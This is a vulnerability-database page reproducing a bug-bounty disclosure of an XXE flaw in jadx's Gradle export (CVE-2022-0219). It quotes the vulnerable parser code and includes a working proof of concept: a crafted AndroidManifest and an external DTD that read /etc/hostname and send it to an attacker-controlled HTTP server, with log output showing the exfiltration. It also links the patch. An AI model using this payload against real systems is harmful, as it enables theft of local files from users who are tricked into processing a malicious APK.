Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrHaxatron0D093863-29E8-4DD7-A885-64F76D50BF5E
HistoryJan 12, 2022 - 3:22 p.m.

in skylot/jadx

2022-01-1215:22:08
haxatron
www.huntr.dev
10
xxe vulnerability
androidmanifest
gradle export

EPSS

0.001

Percentile

33.4%

JSON

Description

parseXml() function in ExportGradleProject is not secured against XXE because it does not include the disallow-doctype-decl attribute, therefore JADX is vulnerable to XXE when parsing a malicious Android Manifest when exporting Android app to Gradle. In

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

DocumentBuilderFactory does not have disallow-doctype-decl attribute set to true, leaving it vulnerable to XXE.

Proof Of Concept

1: Build an android app with the following AndroidManifest.xml stored. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and place in a file name malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, open a HTTP server (which mimics an attacker server) and leave it running

āžœ  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics an attacker server will receive the contents of victim /etc/hostname

āžœ  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability is capable of XXE (info disclosure) when users are tricked into exporting a malicious Android App with a crafted AndroidManifest file to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2

Related

osv 2
prion 1
cvelist 1
nvd 1
github 1
veracode 1
githubexploit 1
cve 1
osv
osv
Improper Restriction of XML External Entity Reference in skylot/jadx
2022-01-21 18:13:42
CVE-2022-0219
2022-01-20 17:15:18
prion
prion
Xxe
2022-01-20 17:15:00
cvelist
cvelist
CVE-2022-0219 Improper Restriction of XML External Entity Reference in skylot/jadx
2022-01-20 16:30:11
nvd
nvd
CVE-2022-0219
2022-01-20 17:15:18
github
github
Improper Restriction of XML External Entity Reference in skylot/jadx
2022-01-21 18:13:42
veracode
veracode
XML External Entity (XXE)
2022-01-21 05:56:10
githubexploit
githubexploit
Exploit for Improper Restriction of XML External Entity Reference in Jadx Project Jadx
2022-01-20 14:24:45
cve
cve
CVE-2022-0219
2022-01-20 17:15:18

EPSS

0.001

Percentile

33.4%

JSON
Related for 0D093863-29E8-4DD7-A885-64F76D50BF5E
osv2prion1cvelist1nvd1github1veracode1githubexploit1cve1